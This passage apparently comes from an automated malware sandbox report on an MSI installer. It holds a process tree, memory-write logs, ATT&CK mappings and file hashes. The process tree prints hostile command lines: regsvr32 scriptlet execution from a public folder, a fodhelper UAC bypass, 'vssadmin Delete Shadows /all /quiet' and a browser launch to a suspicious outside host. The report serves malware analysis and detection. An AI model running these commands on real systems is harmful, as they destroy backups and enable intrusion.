Token: SeChangeNotifyPrivilege	5104	msiexec.exe
Token: SeRemoteShutdownPrivilege	5104	msiexec.exe
Token: SeUndockPrivilege	5104	msiexec.exe
Token: SeSyncAgentPrivilege	5104	msiexec.exe
Token: SeEnableDelegationPrivilege	5104	msiexec.exe
Token: SeManageVolumePrivilege	5104	msiexec.exe
Token: SeImpersonatePrivilege	5104	msiexec.exe
Token: SeCreateGlobalPrivilege	5104	msiexec.exe
Token: SeBackupPrivilege	2392	vssvc.exe
Token: SeRestorePrivilege	2392	vssvc.exe
Token: SeAuditPrivilege	2392	vssvc.exe
Token: SeBackupPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeBackupPrivilege	548	srtasks.exe
Token: SeRestorePrivilege	548	srtasks.exe
Token: SeSecurityPrivilege	548	srtasks.exe
Token: SeTakeOwnershipPrivilege	548	srtasks.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe
Token: SeTakeOwnershipPrivilege	4532	msiexec.exe
Token: SeRestorePrivilege	4532	msiexec.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

msiexec.exemsedge.exe

pid process

5104 msiexec.exe
5104 msiexec.exe
1440 msedge.exe
1440 msedge.exe

pid	process
5104	msiexec.exe
5104	msiexec.exe
1440	msedge.exe
1440	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesvchost.exesihost.exetaskhostw.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 4532 wrote to memory of 548	4532	msiexec.exe	srtasks.exe
PID 4532 wrote to memory of 548	4532	msiexec.exe	srtasks.exe
PID 4532 wrote to memory of 1312	4532	msiexec.exe	MsiExec.exe
PID 4532 wrote to memory of 1312	4532	msiexec.exe	MsiExec.exe
PID 2396 wrote to memory of 944	2396	svchost.exe	regsvr32.exe
PID 2396 wrote to memory of 944	2396	svchost.exe	regsvr32.exe
PID 2384 wrote to memory of 1144	2384	sihost.exe	regsvr32.exe
PID 2384 wrote to memory of 1144	2384	sihost.exe	regsvr32.exe
PID 2492 wrote to memory of 1156	2492	taskhostw.exe	regsvr32.exe
PID 2492 wrote to memory of 1156	2492	taskhostw.exe	regsvr32.exe
PID 1312 wrote to memory of 2628	1312	MsiExec.exe	cmd.exe
PID 1312 wrote to memory of 2628	1312	MsiExec.exe	cmd.exe
PID 2628 wrote to memory of 1440	2628	cmd.exe	msedge.exe
PID 2628 wrote to memory of 1440	2628	cmd.exe	msedge.exe
PID 1440 wrote to memory of 3704	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 3704	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 4548	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 8	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 8	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 860	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 860	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 860	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 860	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 860	1440	msedge.exe	msedge.exe
PID 1440 wrote to memory of 860	1440	msedge.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2384

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
2⤵
- Modifies registry class
PID:1144

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:60

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:408

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:3764

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2332

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:1896

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:3156

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:1080

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2620

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
2⤵
- Modifies registry class
PID:1156

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:688

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:3188

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:4352

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:1268

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:1156

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:1932

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:1268

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\system32\regsvr32.exe
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
2⤵
- Modifies registry class
PID:944

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:4852

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:3580

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:2148

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:964

C:\Windows\system32\cmd.exe
cmd /c "start fodhelper.exe"
2⤵
PID:2840

C:\Windows\system32\fodhelper.exe
fodhelper.exe
3⤵
PID:4196

C:\Windows\system32\regsvr32.exe
"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
4⤵
PID:1488

C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:60

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5104

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 05BCD37A0E5588B5EF7FD2ED87E41176
2⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\System32\cmd.exe
cmd /c "start microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&2219041
3⤵
- Suspicious use of WriteProcessMemory
PID:2628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio&1&43548853&81&417&2219041
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff921194718
5⤵
PID:3704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
5⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:8
5⤵
PID:860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
5⤵
PID:4252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
5⤵
PID:620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
5⤵
PID:4380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5184 /prefetch:8
5⤵
PID:628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5512 /prefetch:8
5⤵
PID:1156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
5⤵
PID:2652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
5⤵
PID:428

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
5⤵
PID:344

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:2220

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7f23c5460,0x7ff7f23c5470,0x7ff7f23c5480
6⤵
PID:3736

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3596 /prefetch:8
5⤵
PID:808

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1272

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3132

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\glvt6878zb
Filesize
1KB

MD5
fe4a708f201a02075821a3adfbf46722

SHA1
0043a0976efb85b573fa959f7db59ff3ea751561

SHA256
e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

SHA512
cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

Download Submit
C:\Users\Public\glvt6878zb
Filesize
1KB

MD5
fe4a708f201a02075821a3adfbf46722

SHA1
0043a0976efb85b573fa959f7db59ff3ea751561

SHA256
e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

SHA512
cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

Download Submit
C:\Users\Public\glvt6878zb
Filesize
1KB

MD5
fe4a708f201a02075821a3adfbf46722

SHA1
0043a0976efb85b573fa959f7db59ff3ea751561

SHA256
e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

SHA512
cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

Download Submit
C:\Users\Public\rtuvkf9dn
Filesize
3KB

MD5
9287a7c05440f4fba02ddc00bbc0d2dc

SHA1
d6d4fd6acec6367ab60e52025090c95b03470812

SHA256
27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

SHA512
522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

Download Submit
C:\Users\Public\rtuvkf9dn
Filesize
3KB

MD5
9287a7c05440f4fba02ddc00bbc0d2dc

SHA1
d6d4fd6acec6367ab60e52025090c95b03470812

SHA256
27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

SHA512
522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

Download Submit
C:\Users\Public\rtuvkf9dn
Filesize
3KB

MD5
9287a7c05440f4fba02ddc00bbc0d2dc

SHA1
d6d4fd6acec6367ab60e52025090c95b03470812

SHA256
27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

SHA512
522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

Download Submit
C:\Windows\Installer\MSIBDB2.tmp
Filesize
52KB

MD5
d6959db7ef3dd8a1d7576dc07b58ac20

SHA1
5d61f82d962bca473eb499a97dd8bd2b0c89787d

SHA256
e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

SHA512
e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

Download Submit
C:\Windows\Installer\MSIBDB2.tmp
Filesize
52KB

MD5
d6959db7ef3dd8a1d7576dc07b58ac20

SHA1
5d61f82d962bca473eb499a97dd8bd2b0c89787d

SHA256
e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

SHA512
e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
Filesize
23.0MB

MD5
afc0194808d23b11be1a18aef9e10231

SHA1
14e204a1207e98a027ff36a6a69b11d5969682bc

SHA256
2a0de9dcf6962a0724ccb9be7c3bd4cb6243a23be6da9be68c5b4258008f528d

SHA512
18334fda61fef82440c4e65b813bd2fc1602c339632ca11118a30a749fc5be15f94aa3d7a1e16874bdaaf7dd7e9c4f462963939be16fbb86374f13f68ee4050a

Download Submit
\??\Volume{c8b84e5a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{8a04187e-bddd-4be7-adb4-759449331aa1}_OnDiskSnapshotProp
Filesize
5KB

MD5
814f9267a3d558df0d00ffdbec7a4948

SHA1
00cf74bd8c222add8811962adb1da3994512475a

SHA256
e246fbed087412a7925a3d23feb8c2ee0e52a5541e669fcb942e1c9f43a963e5

SHA512
09e0fe6b11c55ec3a728600a224dfcaaf9d16a19c31a3c5fb87fec93d607f7dee33d1d5e1028a0f5d5c3662fff7e05efe4dfdb700249937244e0b67d7dd86587

Download Submit
\??\pipe\LOCAL\crashpad_1440_EMJPZEEFKKUVNQAE
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/8-151-0x0000000000000000-mapping.dmp

Download
memory/60-195-0x0000000000000000-mapping.dmp

Download
memory/60-164-0x0000000000000000-mapping.dmp

Download
memory/408-167-0x0000000000000000-mapping.dmp

Download
memory/428-181-0x0000000000000000-mapping.dmp

Download
memory/548-130-0x0000000000000000-mapping.dmp

Download
memory/620-158-0x0000000000000000-mapping.dmp

Download
memory/628-162-0x0000000000000000-mapping.dmp

Download
memory/688-163-0x0000000000000000-mapping.dmp

Download
memory/808-198-0x0000000000000000-mapping.dmp

Download
memory/860-154-0x0000000000000000-mapping.dmp

Download
memory/944-138-0x0000000000000000-mapping.dmp

Download
memory/964-175-0x0000000000000000-mapping.dmp

Download
memory/1080-193-0x0000000000000000-mapping.dmp

Download
memory/1144-139-0x0000000000000000-mapping.dmp

Download
memory/1156-141-0x0000000000000000-mapping.dmp

Download
memory/1156-185-0x0000000000000000-mapping.dmp

Download
memory/1156-177-0x0000000000000000-mapping.dmp

Download
memory/1268-174-0x0000000000000000-mapping.dmp

Download
memory/1268-191-0x0000000000000000-mapping.dmp

Download
memory/1312-131-0x0000000000000000-mapping.dmp

Download
memory/1312-140-0x00000222F4DF0000-0x00000222F4DFC000-memory.dmp

Filesize
48KB

Download
memory/1440-147-0x0000000000000000-mapping.dmp

Download
memory/1488-192-0x0000000000000000-mapping.dmp

Download
memory/1896-186-0x0000000000000000-mapping.dmp

Download
memory/1932-188-0x0000000000000000-mapping.dmp

Download
memory/2140-194-0x0000000000000000-mapping.dmp

Download
memory/2148-170-0x0000000000000000-mapping.dmp

Download
memory/2220-182-0x0000000000000000-mapping.dmp

Download
memory/2332-173-0x0000000000000000-mapping.dmp

Download
memory/2384-142-0x0000021BA90F0000-0x0000021BA90F3000-memory.dmp

Filesize
12KB

Download
memory/2620-196-0x0000000000000000-mapping.dmp

Download
memory/2628-144-0x0000000000000000-mapping.dmp

Download
memory/2652-179-0x0000000000000000-mapping.dmp

Download
memory/2768-184-0x0000000000000000-mapping.dmp

Download
memory/2840-187-0x0000000000000000-mapping.dmp

Download
memory/3156-189-0x0000000000000000-mapping.dmp

Download
memory/3188-168-0x0000000000000000-mapping.dmp

Download
memory/3580-166-0x0000000000000000-mapping.dmp

Download
memory/3704-148-0x0000000000000000-mapping.dmp

Download
memory/3736-183-0x0000000000000000-mapping.dmp

Download
memory/3764-169-0x0000000000000000-mapping.dmp

Download
memory/4196-190-0x0000000000000000-mapping.dmp

Download
memory/4252-156-0x0000000000000000-mapping.dmp

Download
memory/4352-171-0x0000000000000000-mapping.dmp

Download
memory/4380-160-0x0000000000000000-mapping.dmp

Download
memory/4548-150-0x0000000000000000-mapping.dmp

Download
memory/4852-165-0x0000000000000000-mapping.dmp

Download